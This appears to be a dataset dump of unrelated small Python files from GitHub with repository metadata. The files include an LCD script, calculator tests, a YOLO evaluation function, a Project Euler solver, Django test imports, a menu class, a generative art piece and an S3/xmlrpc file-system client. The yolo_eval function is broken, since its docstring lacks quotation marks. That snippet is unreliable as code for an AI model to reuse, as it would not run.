| no_license | https://github.com/smartaleciam/playcard | a35c2a4aeb03c39217433835bc66352e783c357d | 9abefe2652e4e8f99e28127e95d2cec12bedcf59 | refs/heads/main | 2023-06-12T19:18:41.352208 | 2021-06-27T10:43:43 | 2021-06-27T10:43:43 | 306,681,286 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import Adafruit_CharLCD as LCD
lcd = LCD.Adafruit_CharLCD(4, 24, 23, 17, 18, 22, 16, 2, 5)
lcd.clear()
lcd.set_backlight(0) | UTF-8 | Python | false | false | 147 | py | 41 | clear_lcd.py | 36 | 0.687075 | 0.578231 | 0 | 7 | 20.142857 | 59 |
graalumj/Github-Actions-CI | 14,164,802,158,806 | aa37017053442e9492f01b4cf3fee97664928179 | d8e533937f2064785ed751e0f4fad83f31ac34ef | /test.py | c9dcb44f4beeb1d09f91773c328180ac9a4b1ba1 | []
| no_license | https://github.com/graalumj/Github-Actions-CI | afe7d5a45e2894b09ac57924877c69268eea413b | 6cebe2e623ae9bb7368cd973000a906fade307fa | refs/heads/main | 2023-05-13T12:55:09.443632 | 2021-06-06T19:03:54 | 2021-06-06T19:03:54 | 374,434,876 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import unittest
import calculator
class TestCase(unittest.TestCase):
def test_add(self):
self.assertEqual(calculator.add(1, 2), 3)
def test_subtract(self):
self.assertEqual(calculator.subtract(1, 1), 0)
def test_mutliply(self):
self.assertEqual(calculator.multiply(2, 3), 6)
def test_divide(self):
self.assertEqual(calculator.divide(4, 2), 2)
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 446 | py | 1 | test.py | 1 | 0.643498 | 0.616592 | 0 | 21 | 20.238095 | 54 |
divyanshrm/yolo_implementation | 867,583,440,827 | 9fc83af8264cb3fcac5ac51c6dfd9ef98ce0bb8e | 826e513fd09d88416cb554e3824b32238180e6d3 | /yolo_eval.py | 1c1633eaa66a871f1bf4d34e2dae971fa7c9c9f0 | [
"MIT"
]
| permissive | https://github.com/divyanshrm/yolo_implementation | 09f61a2ee366818da19aa640278295975cd2025a | bb94246972ef018289f8254b4abec5c53c1413ce | refs/heads/master | 2020-12-28T10:41:15.518611 | 2020-04-14T01:32:33 | 2020-04-14T01:32:33 | 238,294,627 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
Converts the output of YOLO encoding (a lot of boxes) to predicted boxes along with their scores, box coordinates and classes.
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
boxes = yolo_boxes_to_corners(box_xy, box_wh)
scores, boxes, classes = yolo_filter_boxes(box_confidence,boxes,box_class_probs,score_threshold)
boxes = scale_boxes(boxes, image_shape)
scores, boxes, classes = yolo_non_max_suppression(scores,boxes,classes,iou_threshold=iou_threshold)
return scores, boxes, classes | UTF-8 | Python | false | false | 720 | py | 5 | yolo_eval.py | 4 | 0.655556 | 0.640278 | 0 | 22 | 30.818182 | 130 |
tkoz0/problems-project-euler | 7,894,149,933,602 | 81563eb45a382d63c97a8ab028af980df85e8bdb | bd844f868da174a15a54751609847320919bc4f6 | /p027a.py | de8cdc573d667a289a67373f60fb557c55ef4136 | []
| no_license | https://github.com/tkoz0/problems-project-euler | f8fa2c846b3f2c9719742d71acd1e837b3486e07 | 93e0bc51276acdd7729a45a18c05fd3a6eb1f125 | refs/heads/master | 2023-06-07T00:12:10.435409 | 2023-05-28T02:38:33 | 2023-05-28T02:38:33 | 157,948,871 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import libtkoz as lib
arange = 999 # -999 to 999
brange = 1000 # -1000 to 1000
pseqlenparam = 100 # estimate for longer sequences to determine prime cache size
# quadratic function is x^2+ax+b
# computing next: f(x+1) - f(x) = (x^2+2x+1+ax+a+b) - (x^2+ax+b)
# = 2x+1+a --> use this as difference to compute next more efficiently
# generate a set of primes to quickly look up
# if x may go up to 100, 100^2+1000*100+1000 ~= 10^5 --> seems reasonable
# pick the largest term at x=100
ptablemax = max(pseqlenparam**2, pseqlenparam*arange, brange)
ptable = lib.list_primes2(ptablemax,return_set=True)
def prime(n):
global ptable
global ptablemax
return (n <= ptablemax and n in ptable) or lib.prime(n)
print(': listed', len(ptable), 'primes <=', ptablemax)
# f(x) = x^2 + ax + b
# f(0) = b --> b must be prime
# f(1) = 1 + a + b --> if b odd then a must be odd
# f(x+1) - f(x) = 2x + 1 + a --> a must be odd so the step size is even
if arange % 2 == 0: arange -= 1 # ensure it is odd
mostprimes = 0
amost, bmost = 0, 0
for b in range(3, brange+1, 2):
if not prime(b): continue
for a in range(-arange, arange+1, 2):
x = 1
f = 1 + a + b # f(1)
while prime(f):
f += 2 * x + 1 + a
x += 1
if x > mostprimes:
mostprimes = x
amost, bmost = a, b
print(': f(x) = x^2 +', a, '* x +', b, '-->', x, 'primes')
print(amost * bmost)
| UTF-8 | Python | false | false | 1,430 | py | 238 | p027a.py | 207 | 0.583217 | 0.525175 | 0 | 41 | 33.878049 | 80 |
gregmuellegger/django | 9,414,568,318,895 | 947c88e9281e1aeb14754b4b576743e655b61b8a | 7fc3cafe26dd5396dce8fe5ec341115ed9b27c25 | /tests/regressiontests/localflavor/tests.py | 856e518bed3a906105da5cc413258691e2eafa2a | [
"BSD-3-Clause"
]
| permissive | https://github.com/gregmuellegger/django | e3e2860ff4d51629ff2a44801f4611919fc5b2b5 | fa182e8ae82f33764d5e1f70bcd45899e1bf17e6 | refs/heads/master | 2021-01-16T20:01:13.750357 | 2012-06-12T10:30:52 | 2012-06-26T16:39:14 | 1,046,323 | 22 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import absolute_import
from .ar.tests import ARLocalFlavorTests
from .at.tests import ATLocalFlavorTests
from .au.tests import AULocalflavorTests
from .be.tests import BELocalFlavorTests
from .br.tests import BRLocalFlavorTests
from .ca.tests import CALocalFlavorTests
from .ch.tests import CHLocalFlavorTests
from .cl.tests import CLLocalFlavorTests
from .cn.tests import CNLocalFlavorTests
from .co.tests import COLocalFlavorTests
from .cz.tests import CZLocalFlavorTests
from .de.tests import DELocalFlavorTests
from .ec.tests import ECLocalFlavorTests
from .es.tests import ESLocalFlavorTests
from .fi.tests import FILocalFlavorTests
from .fr.tests import FRLocalFlavorTests
from .gb.tests import GBLocalFlavorTests
from .generic.tests import GenericLocalFlavorTests
from .hk.tests import HKLocalFlavorTests
from .hr.tests import HRLocalFlavorTests
from .id.tests import IDLocalFlavorTests
from .ie.tests import IELocalFlavorTests
from .il.tests import ILLocalFlavorTests
from .in_.tests import INLocalFlavorTests
from .is_.tests import ISLocalFlavorTests
from .it.tests import ITLocalFlavorTests
from .jp.tests import JPLocalFlavorTests
from .kw.tests import KWLocalFlavorTests
from .mk.tests import MKLocalFlavorTests
from .mx.tests import MXLocalFlavorTests
from .nl.tests import NLLocalFlavorTests
from .pl.tests import PLLocalFlavorTests
from .pt.tests import PTLocalFlavorTests
from .py.tests import PYLocalFlavorTests
from .ro.tests import ROLocalFlavorTests
from .ru.tests import RULocalFlavorTests
from .se.tests import SELocalFlavorTests
from .si.tests import SILocalFlavorTests
from .sk.tests import SKLocalFlavorTests
from .tr.tests import TRLocalFlavorTests
from .us.tests import USLocalFlavorTests
from .uy.tests import UYLocalFlavorTests
from .za.tests import ZALocalFlavorTests
| UTF-8 | Python | false | false | 1,815 | py | 192 | tests.py | 148 | 0.85124 | 0.85124 | 0 | 45 | 39.333333 | 50 |
thierry-bm/portefeuille | 1,726,576,856,149 | 4e43f15b34f91de6c6f6343da8e9b56118e62e8d | 713b4bfda3f137a13c3a3da03b3d3cbfbb7cfbd4 | /main5.py | dd1d7b67965ffbfaa85325ace60de7fdaa7e6a83 | []
| no_license | https://github.com/thierry-bm/portefeuille | 3f55499d76f06e2e1532332b9472bea474d6f0c0 | dd1b47ebeb4441111dfbb1504939a91f530117ca | refs/heads/master | 2020-08-29T04:48:18.538536 | 2020-03-22T21:53:32 | 2020-03-22T21:53:32 | 217,932,748 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """On veut étudier la façon de calibrer cett utilité.
"""
# %%
import utility as ut
import numpy as np
import matplotlib.pyplot as plt
#%%
u = ut.get_cvx_utility(3)
r = np.linspace(-5,5,100)
us = {}
for β in [1,2,3]:
u = ut.get_cvx_utility(β)
plt.plot(r,u(r).value)
plt.legend([1,2,3])
plt.grid()
plt.plot()
# %%
| UTF-8 | Python | false | false | 334 | py | 21 | main5.py | 10 | 0.613982 | 0.577508 | 0 | 24 | 12.708333 | 54 |
ShrutiAggarwal99/TaskMaster | 6,622,839,580,471 | ecf93f713d4622eab2027d7a2b4d73dec6737ef1 | d757765f5ae1ffe7182fabd8a4fce340b5c35def | /env/lib/python3.6/base64.py | f95164da006b89beeef0c2ff4b56d7f3b38e664d | []
| no_license | https://github.com/ShrutiAggarwal99/TaskMaster | de6c9073a0f6decc06d4e929a5e192f64b580430 | 8f64422752bcbf9670d0be291e22546ebead75d6 | refs/heads/master | 2021-07-13T05:30:13.166018 | 2021-03-01T05:35:50 | 2021-03-01T05:35:50 | 230,086,228 | 0 | 0 | null | false | 2021-03-20T02:30:02 | 2019-12-25T10:31:35 | 2021-03-01T05:35:52 | 2021-03-20T02:30:02 | 16,679 | 0 | 0 | 1 | HTML | false | false | /home/shruti/anaconda3/lib/python3.6/base64.py | UTF-8 | Python | true | false | 46 | py | 50 | base64.py | 43 | 0.826087 | 0.717391 | 0 | 1 | 46 | 46 |
yofn/pyacm | 6,571,299,998,018 | cee2a8aa9d7dc7c452b4225fbe3d428aa335493c | a4456d808b4c72574a11c88282920a917b076f5b | /bnu/2020p1/3D层级.py | 2f5c933bdcfe5da0c8ee0140cd17a216138d3032 | [
"Apache-2.0"
]
| permissive | https://github.com/yofn/pyacm | 635f3b17cc08d9e702b561f9582fec4d694458b1 | e573f8fdeea77513711f00c42f128795cbba65a6 | refs/heads/master | 2023-07-09T02:11:31.044020 | 2021-08-10T02:02:24 | 2021-08-10T02:02:24 | 270,663,600 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# https://codeforces.com/problemset/problem/17/B
# 覆盖所有节点的最短路径?
# 图的表示: matrix, list
# https://www.geeksforgeeks.org/comparison-between-adjacency-list-and-adjacency-matrix-representation-of-graph/
# DFS的实现: stack(非递归); 递归
# https://likegeeks.com/depth-first-search-in-python/
# 到底是DSU更好还是DFS更好?
# https://codeforces.com/blog/entry/451
# 即不用DSU也不用DFS, 可以用最小生成树或贪心方法(取cost最小的parent)
def f(n,l):
pl = [None]*(n+1) #p[0] is not used!
for a,b,c in l:
if pl[b] is None:
pl[b] = []
pl[b].append(c)
cr = sum([p is None for p in pl])
if cr>2:
return -1
return sum([min(p) for p in pl if p is not None])
n = int(input()) #1000
input()
a = int(input())
l = [list(map(int,input().split())) for _ in range(a)]
print(f(n,l))
| UTF-8 | Python | false | false | 907 | py | 712 | 3D层级.py | 703 | 0.631117 | 0.613551 | 0 | 28 | 27.464286 | 111 |
maiyajj/AutoTest_script-Appium_Connect | 17,763,984,766,715 | bec5a0c844a3948568f6acd43d2f619791d7b012 | f925499f896b012624118cfafd02fef76ff5075a | /src/testcase/GN_APP/input_case/GN_APP_Input_Case.py | 889adfc932d3adae349c4bd6ce5e9400ae4095bf | [
"Apache-2.0"
]
| permissive | https://github.com/maiyajj/AutoTest_script-Appium_Connect | f7c06db1d2f58682d1a9d6f534f7dd5fb65d766d | f9c2c42c281a9e2f984acb4a72dda0694b053f22 | HEAD | 2019-07-26T01:39:48.413753 | 2018-04-11T02:11:38 | 2018-04-11T02:11:38 | 112,449,369 | 30 | 22 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
try:
from .GN_APP_Account_Settings import *
from .GN_APP_Device_Page import *
from .GN_APP_Feed_Back import *
from .GN_APP_Forget_Password import *
from .GN_APP_Login import *
from .GN_APP_Message_Classify import *
from .GN_APP_Register import *
from .GN_APP_Theme_Style import *
from .GN_APP_Using_Help import *
from .GN_APP_Version import *
except ImportError as e:
print(e)
| UTF-8 | Python | false | false | 436 | py | 188 | GN_APP_Input_Case.py | 181 | 0.665138 | 0.662844 | 0 | 14 | 30.142857 | 42 |
naivelamb/leetcode | 12,257,836,677,639 | 0f7ac036177658940e45f2d445259462c481def0 | 7426f3cde2c93d65ffa76c904ba477d26becef8d | /0338_CountingBits.py | 892148d178eee57967b45e6d2a589331e130085f | []
| no_license | https://github.com/naivelamb/leetcode | 5e8ac58f606e0419a10d8fd9c1f532b4f9814017 | bae36601c3ce67f2b4a91d331a2d70dca8a1ee92 | refs/heads/master | 2021-07-23T20:38:06.265839 | 2021-07-12T16:14:21 | 2021-07-12T16:14:21 | 166,906,784 | 20 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
https://leetcode.com/problems/counting-bits/
DP
The results of [2**k, 2**(k+1) - 1] is a replication of [0, 2**(k-1)], add 1 to every element.
"""
class Solution:
def countBits(self, num: int) -> List[int]:
dp = [0] * (num+1)
i, base = 0, 1
while i + base <= num:
while i <= base and i + base <= num:
dp[i+base] = 1 + dp[i]
i += 1
i = 0
base *= 2
return dp
| UTF-8 | Python | false | false | 466 | py | 753 | 0338_CountingBits.py | 752 | 0.454936 | 0.420601 | 0 | 17 | 26.411765 | 94 |
WeglarzK/cdv | 18,734,647,366,394 | 93023a72fe9fcc5bcfcc3cfc517716adeb106dda | 21c7b9a44869446a05d8c320addb697968766130 | /Podstawy_Programowania/1_podstawy.py | 3b23f1ca78a73ae4c6aa01437a3bc1427c9ec221 | []
| no_license | https://github.com/WeglarzK/cdv | 62464c4019b6e31ba6b4b43ff8e4cdb5f11616d2 | 7087246dab7f82adb955e40d4b3a14eb53faf66d | refs/heads/master | 2021-05-17T23:34:35.282381 | 2020-05-24T13:15:09 | 2020-05-24T13:15:09 | 251,005,233 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print("CDV11")
print(8)
#potęgowanie
#pow = 2**10
#print(pow)
#pobieranie danych z klawiatury
#name = input()
#print("Twoje imie: "+name)
#surname=input()
#print("Twoje imie: " + name + ", nazwisko: " + surname)
#length= len(surname)
#print(length)
#print(type(surname))
#print(type(length))
#length = str(length)
#print(type(length))
name1=input()
surname1=input()
age=input()
print("Twoje imie: " + name1 + "\nTwoje nazwisko: " + surname1 + "\nTwoj wiek: " + age +".") | UTF-8 | Python | false | false | 477 | py | 12 | 1_podstawy.py | 12 | 0.655462 | 0.634454 | 0 | 26 | 17.346154 | 92 |
andrewzz310/SUFS | 7,988,639,216,457 | 880cbba0f0acb0859359e3d07e690d9f8abc3982 | 6d2157cd45799fc890a15de91c96d787fc4d1343 | /Client/Client.py | 5a0f5b32045892bd37aac396f4c9b21391757c70 | []
| no_license | https://github.com/andrewzz310/SUFS | b5065c9cd28178fb2e4d1b3e175b7c77b05f0469 | 2468122627232facaf1d68541aa3d1760f1277e0 | refs/heads/master | 2021-04-29T18:44:50.865235 | 2018-07-11T05:58:15 | 2018-07-11T05:58:15 | 126,285,409 | 1 | 0 | null | true | 2018-03-22T05:41:52 | 2018-03-22T05:41:52 | 2018-03-16T05:51:40 | 2018-03-16T05:51:39 | 310 | 0 | 0 | 0 | null | false | null | import xmlrpclib
import os
import boto3
from modules import BlockDivider
class Client:
def __init__(self):
self.file_name = None
self.path = None
self.bucket_name = 'sufs-shieldsj'
#self.bucket_name = 'sufs-client'
self.RPC_NAMENODE_SERVER_URL = ''
self.rpc_namenode = None
self.alive = {}
self.REPLICATION = 3
def set_namenode(self, url):
self.RPC_NAMENODE_SERVER_URL = url
self.rpc_namenode = xmlrpclib.ServerProxy("http://" + str(self.RPC_NAMENODE_SERVER_URL) + ':8000')
def put_file_to_nn(self, path, bucket_name, file_name):
self.path = path
self.file_name = file_name
self.save_file_from_s3(bucket_name, self.file_name)
block_info = self.register_file_to_nn(self.path, self.file_name, os.path.getsize(self.file_name))
block_divider = BlockDivider.BlockDivider(64000000)
print('block info:', block_info)
# Split files
blocks = block_divider.split_file(path, self.file_name, '')
for block in block_info:
print("********next block********")
smalldivider = BlockDivider.BlockDivider(4000000)
smallblocks = smalldivider.split_file(path, block[0], '')
print ("********dividing into small chunks********")
for smallblock in smallblocks:
print 'Connected to Datanode ' + str(block[1]) + ' and ' + block[0] + " mini-block " + smallblock
rpc_datanode = xmlrpclib.ServerProxy(str(block[1]) + ':8888')
with open(smallblock, "rb") as handle:
obj = xmlrpclib.Binary(handle.read())
print(rpc_datanode.receiveBlock(block[0], obj))
# delete block file from local storage
print ("********removing small chunk********")
os.remove(smallblock)
print ("********removing parent chunk********")
os.remove(block[0])
# Remove original file
os.remove(file_name)
# Send each block to Datanode
def saveCode(self): #lol
block_info = []
file_name = "blah"
for block in block_info:
print 'Connected to Datanode ' + str(block[1]) + ' and ' + block[0]
rpc_datanode = xmlrpclib.ServerProxy(str(block[1]) + ':8888')
with open(block[0], "rb") as handle:
obj = xmlrpclib.Binary(handle.read())
print(rpc_datanode.receiveBlock(block[0], obj))
# delete block file from local storage
os.remove(block[0])
# delete original file from local storage
os.remove(file_name)
def save_file_from_s3(self, bucket_name, file_name):
s3 = boto3.client('s3')
response = s3.get_object(Bucket=bucket_name, Key=file_name)
temp_file = open(file_name, 'w+')
temp_file.write(response['Body'].read())
temp_file.close()
print 'File Name:', file_name, 'File Size:', os.path.getsize(file_name)
def show_all_s3_files(self):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.bucket_name)
result = list()
for obj in bucket.objects.all():
print(obj.key)
result.append(obj.key)
return result
def register_file_to_nn(self, path, file_name, file_size):
return self.rpc_namenode.putFile(path, file_name, file_size)
def delete_file(self, path, file_name):
datanode_list = self.rpc_namenode.deleteFile(path, file_name)
print('datanode_list: ')
print(datanode_list)
if not datanode_list: # check if datanode_list is empty
return 'Block does not exists...'
else:
print 'Deleting ' + path + file_name
self.remove_files_from_datanodes(datanode_list)
return 'Removed blocks!'
def remove_files_from_datanodes(self, dn_list):
# connect to each datanode and remove block
for block in dn_list:
for dn in dn_list[block]:
print('dn:', dn)
dn_rpc = xmlrpclib.ServerProxy(dn + ':8888')
dn_rpc.removeBlock(block)
print('Deleted Block ' + block + ' from ' + dn)
return True
def delete_dir(self, dir_path):
datanode_list = self.rpc_namenode.deletedir(dir_path)
print(datanode_list)
if not datanode_list:
return 'Block does not exists...'
else:
self.remove_files_from_datanodes(datanode_list)
return 'Removed blocks!'
def read_file(self, path, file_name):
dict = self.rpc_namenode.lsDataNode(path+file_name)
outputFile = open(file_name, 'ab+')
for blockID, listDN in sorted(dict.iteritems()):
# choose the 1st DataNode in listDN
dnIP = listDN[0]
# make the connect to this DataNode to read the block
dn_rpc = xmlrpclib.ServerProxy(dnIP + ':8888')
block_data = dn_rpc.giveBlock(blockID)
print('Block Data:', block_data)
# write to the file
outputFile.write(block_data.data)
outputFile.close()
return True
| UTF-8 | Python | false | false | 5,248 | py | 15 | Client.py | 13 | 0.569169 | 0.557355 | 0 | 160 | 31.8 | 113 |
weikent/Python | 4,552,665,364,381 | 122fd907a941382ac71ab9a42b694908170a841f | 771be28beb8846d25c4cc37fcd910c07e76d23b2 | /python/pythonFirstGame/Menu.py | 33e4e949a19092acf82ce071b5d8009994e48ab1 | []
| no_license | https://github.com/weikent/Python | f31628f017253d8fc65dac5df5df82649235199f | 08aaa744b242020dc3ad8856565ac909b601cd9c | refs/heads/master | 2021-06-11T23:38:52.213947 | 2017-08-01T05:59:01 | 2017-08-01T05:59:01 | 15,369,463 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*- coding: utf-8 -*-
import types
class Menu(object):
"""
"""
def __init__(self, menu):
"""
Arguments:
- `Menu`:
"""
self._menu = menu
def show(self):
"""
Arguments:
- `self`:
"""
flag = True
dictStr = self._menu
tempList = []
while flag:
i = 1
tem = ""
if len(tempList) == 0:
tem = dictStr.keys()
else:
strlist = "dictStr["
for string in tempList:
strlist += '"'+string+'"'+"]["
#exec("print %s" %strlist[:-1])
exec("a = type(%s) == types.DictType" % strlist[:-1])
if not(a):
# exec("for string in %s:print string;i+=1" %strlist[:-1])
flag = 0
break
else:
exec("tem = %s.keys()" % strlist[:-1])
# exec("""for i in %s:
# print i""" % strlist[:-1])
for strr in tem:
print str(i) + '.' + strr
i+=1
action = raw_input("please choose a action (1-%d)>>>" %(i-1))
if action <> "":
action = int(action)
else:
continue
if action in range(1,i) and tem[action - 1] == "Cancel":
tempList.pop()
elif action in range(1,i):
tempList.append(tem[action-1])
else:
print "unknown choose...."
# exec("magic = %s(player);magic.use(player)" % tempList[len(tempList) - 1])
print tempList[len(tempList) - 1]
return tempList[len(tempList) - 1]
| UTF-8 | Python | false | false | 1,805 | py | 94 | Menu.py | 71 | 0.380055 | 0.368975 | 0 | 73 | 23.726027 | 99 |
LukeMurphy/RPI | 5,712,306,532,626 | 180bf393edd78aadce3999c873a7109381724a83 | 30dd17ec43e4ce2cae87b1186d3b35736e2bab20 | /pieces/singletons/moving_bars.py | da1dd40601e658dfe0d0374fc9e2b76b086fe4fd | []
| no_license | https://github.com/LukeMurphy/RPI | de2329fa82a36fac953d832fbb9a77ea9eae75d5 | 78a6b0d34d2b3b65f9dd7a502f60d500c0c11b80 | refs/heads/py3.6 | 2023-08-30T22:57:33.303969 | 2021-10-15T19:01:38 | 2021-10-15T19:01:38 | 45,502,537 | 3 | 0 | null | false | 2020-03-31T13:11:08 | 2015-11-03T23:27:06 | 2020-03-31T13:00:33 | 2020-03-31T13:00:30 | 358,477 | 3 | 1 | 0 | Python | false | false | import math
import random
import threading
import time
from modules.configuration import bcolors
from modules import colorutils
from PIL import Image, ImageDraw, ImageEnhance, ImageFont, ImageOps
'''
fadeIn = Fader()
# fadeIn.blankImage = Image.new("RGBA", (height, width))
fadeIn.crossFade = Image.new("RGBA", (height, width))
fadeIn.image = gradientImage
fadeIn.xPos = xPos
fadeIn.yPos = yPos
fadeIn.height = gradientImage.height
fadeIn.width = gradientImage.width
config.fadeArray.append(fadeIn)
'''
class Fader:
def __init__(self):
self.doingRefresh = 0
self.doingRefreshCount = 50
self.fadingDone = False
def fadeIn(self, config):
if self.fadingDone == False:
if self.doingRefresh < self.doingRefreshCount:
self.blankImage = Image.new("RGBA", (self.width, self.height))
self.crossFade = Image.blend(
self.blankImage,
self.image,
self.doingRefresh / self.doingRefreshCount,
)
config.image.paste(
self.crossFade, (self.xPos, self.yPos), self.crossFade
)
self.doingRefresh += 1
else:
config.image.paste(self.image, (self.xPos, self.yPos), self.image)
self.fadingDone = True
class Bar:
def __init__(self):
self.remake()
def remake(self) :
self.xSpeed = random.uniform(config.xSpeedRangeMin * config.direction, config.xSpeedRangeMax * config.direction)
self.ySpeed = random.uniform(config.ySpeedRangeMin, config.ySpeedRangeMax)
self.yPos = round(random.uniform(config.yRangeMin,config.yRangeMax))
self.xPos = -config.barThicknessMax * 2
if config.direction == -1 :
self.xPos = config.canvasWidth + config.barThicknessMax * 2
self.barThickness = round(random.uniform(config.barThicknessMin, config.barThicknessMax))
#self.colorVal = colorutils.randomColorAlpha()
cset = config.colorSets[config.usingColorSet]
self.colorVal = colorutils.getRandomColorHSV(cset[0], cset[1], cset[2], cset[3], cset[4], cset[5], config.dropHueMax,0, config.colorAlpha, config.brightness )
self.outlineColorVal = colorutils.getRandomColorHSV(cset[0], cset[1], cset[2], cset[3], cset[4], cset[5], config.dropHueMax,0, config.outlineColorAlpha, config.brightness )
def transformImage(img):
width, height = img.size
new_width = 50
m = 0.0
img = img.transform(
(new_width, height), Image.AFFINE, (1, m, 0, 0, 1, 0), Image.BICUBIC
)
return img
def drawBar():
global config
def reDraw():
global config
def runWork():
global config
print(bcolors.OKGREEN + "** " + bcolors.BOLD)
print("Running moving_bars.py")
print(bcolors.ENDC)
while config.isRunning == True:
iterate()
time.sleep(config.redrawRate)
if config.standAlone == False :
config.callBack()
def iterate():
global config
for i in range(0, config.numberOfBars):
bar = config.barArray[i]
bar.xPos += bar.xSpeed
bar.yPos += bar.ySpeed
w = round(math.sqrt(2) * config.barThicknessMax * 1.5)
angle = 180/math.pi * math.tan(bar.ySpeed/abs(bar.xSpeed))
temp = Image.new("RGBA", (w, w))
drw = ImageDraw.Draw(temp)
if config.tipType == 1 :
drw.rectangle((0, 0, bar.barThickness * 2, bar.barThickness ), fill = bar.colorVal, outline = bar.outlineColorVal)
drw.rectangle((0, 2, bar.barThickness * 2, bar.barThickness+2 ), fill = bar.colorVal, outline = bar.outlineColorVal)
else :
drw.ellipse((0, 2, bar.barThickness, bar.barThickness+2 ), fill = bar.colorVal, outline = bar.outlineColorVal)
temp = temp.rotate(config.tipAngle - angle)
config.image.paste(temp,(round(bar.xPos), round(bar.yPos)), temp)
if bar.xPos > config.canvasWidth and config.direction == 1:
bar.remake()
if bar.xPos < 0 and config.direction == -1:
bar.remake()
if random.random() < .002 :
if config.dropHueMax == 0 :
config.dropHueMax = 255
else :
config.dropHueMax = 0
#print("Winter... " + str(config.dropHueMax ))
if random.random() < .003 :
config.usingColorSet = math.floor(random.uniform(0,config.numberOfColorSets))
# just in case ....
if config.usingColorSet == config.numberOfColorSets :
config.usingColorSet = config.numberOfColorSets-1
config.colorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
config.dropHueMax = 0
#config.tipType = round(random.random())
#print("ColorSet: " + str(config.usingColorSet))
config.render(config.image, 0,0)
def main(run=True):
global config
config.redrawRate = .02
config.image = Image.new("RGBA", (config.screenWidth, config.screenHeight))
config.draw = ImageDraw.Draw(config.image)
config.canvasImage = Image.new("RGBA", (config.canvasWidth, config.canvasHeight))
config.canvasDraw = ImageDraw.Draw(config.canvasImage)
config.xPos = 0
config.dropHueMax = 0
config.numberOfBars = int(workConfig.get("bars", "numberOfBars"))
config.barThicknessMin = int(workConfig.get("bars", "barThicknessMin"))
config.barThicknessMax = int(workConfig.get("bars", "barThicknessMax"))
config.direction = int(workConfig.get("bars", "direction"))
yRange = (workConfig.get("bars", "yRange")).split(",")
config.yRangeMin = int(yRange[0])
config.yRangeMax = int(yRange[1])
config.leadEdgeAlpahMin = int(workConfig.get("bars", "leadEdgeAlpahMin"))
config.leadEdgeAlpahMax = int(workConfig.get("bars", "leadEdgeAlpahMax"))
config.tipAngle = float(workConfig.get("bars", "tipAngle"))
config.xSpeedRangeMin = float(workConfig.get("bars", "xSpeedRangeMin"))
config.xSpeedRangeMax = float(workConfig.get("bars", "xSpeedRangeMax"))
config.ySpeedRangeMin = float(workConfig.get("bars", "ySpeedRangeMin"))
config.ySpeedRangeMax = float(workConfig.get("bars", "ySpeedRangeMax"))
config.tipType = 1
config.colorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
config.outlineColorAlpha = round(random.uniform(config.leadEdgeAlpahMin,config.leadEdgeAlpahMax))
yPos = 0
config.barArray = []
config.colorSets = []
config.colorSetList = list(
i for i in (workConfig.get("bars", "colorSets").split(","))
)
config.numberOfColorSets = len(config.colorSetList)
for setName in config.colorSetList :
cset = list(
float(i) for i in (workConfig.get("bars", setName).split(","))
)
config.colorSets.append(cset)
config.usingColorSet = math.floor(random.uniform(0,config.numberOfColorSets))
if config.usingColorSet == config.numberOfColorSets : config.usingColorSet = config.numberOfColorSets - 1
# initialize and place the first set
for i in range(0, config.numberOfBars):
bar = Bar()
bar.yPos = round(random.uniform(config.yRangeMin,config.yRangeMax))
bar.xPos = round(random.uniform(0,config.canvasWidth - config.barThicknessMax))
config.barArray.append(bar)
#yPos += bar.barThickness
if run:
runWork()
| UTF-8 | Python | false | false | 6,722 | py | 585 | moving_bars.py | 160 | 0.7169 | 0.705147 | 0 | 217 | 29.976959 | 174 |
Yiftah/Udacity | 4,501,125,759,636 | c4f29a8326da5d107d4cb880a8e8bb6c35dcdced | bcd40d3361c91b16bef69299d3701ab1ac7db169 | /entertainment_center.py | a477129c8de12b31417d7052d9e9f8340f53282e | []
| no_license | https://github.com/Yiftah/Udacity | 4b3c7346ab38162b01ff1ff96d04a6a27b12ecb6 | 58f3de75f7517e2c135dc49457d7c6c961ed0184 | refs/heads/master | 2021-01-01T19:34:29.114435 | 2015-02-06T17:33:03 | 2015-02-06T17:33:03 | 30,387,840 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import media
import fresh_tomatoes
toy_story = media.Movie("Toy Story", "A boy and his toys", "http://upload.wikimedia.org/wikipedia/en/thumb/6/69/Toy_Story_3_poster.jpg/220px-Toy_Story_3_poster.jpg", "https://www.youtube.com/watch?v=vwyZH85NQC4")
avatar = media.Movie("Avatar", "Marine on an alian planet", "http://upload.wikimedia.org/wikipedia/en/thumb/b/b0/Avatar-Teaser-Poster.jpg/220px-Avatar-Teaser-Poster.jpg", "https://www.youtube.com/watch?v=cRdxXPV9GNQ");
fresh_tomatoes.open_movies_page([toy_story, avatar])
| UTF-8 | Python | false | false | 531 | py | 1 | entertainment_center.py | 1 | 0.741996 | 0.711864 | 0 | 6 | 85.833333 | 218 |
JoaoGaBRiel-X/apitermoplus | 17,918,603,573,279 | 85eb7105403e3f13c146eebd26aafe67f1d6d14f | efde5b50f48161bf2817fdf02c2380032de68164 | /apitermoplus/urls.py | 4e2b5b9fcd108c60009bb017fc2cf450ce3a938d | []
